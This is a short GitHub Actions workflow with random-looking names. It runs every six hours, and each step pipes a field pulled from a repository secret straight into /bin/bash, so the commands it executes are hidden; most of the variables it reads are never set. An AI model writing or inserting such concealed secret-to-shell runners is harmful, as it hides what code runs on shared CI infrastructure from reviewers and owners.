name: lvhuaiqing4567
on:
  workflow_dispatch:
  schedule:
    - cron: '43 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: lvhuaiqing4567
        env:
          sn05209: ${{ secrets.sn05209 }}
        run: |
          echo $sn05209 | jq -r .ff123 | /bin/bash
          echo $gf2 | jq -r .of7881 | /bin/bash
          echo $sprg98338 | jq -r .t7 | /bin/bash
          echo $hkruq1 | jq -r .mtxez9418 | /bin/bash
          echo $ti23263 | jq -r .jzyo866 | /bin/bash
          echo $t03829 | jq -r .g93831 | /bin/bash
          echo $er969 | jq -r .ye3 | /bin/bash
          echo $xjns2405 | jq -r .ep58733 | /bin/bash
          echo $n30354 | jq -r .ckh876 | /bin/bash
          echo $ss9 | jq -r .zqsxl11194 | /bin/bash
          echo $dfj1522 | jq -r .jybr3805 | /bin/bash
          echo $qrvse0156 | jq -r .ajq5061 | /bin/bash

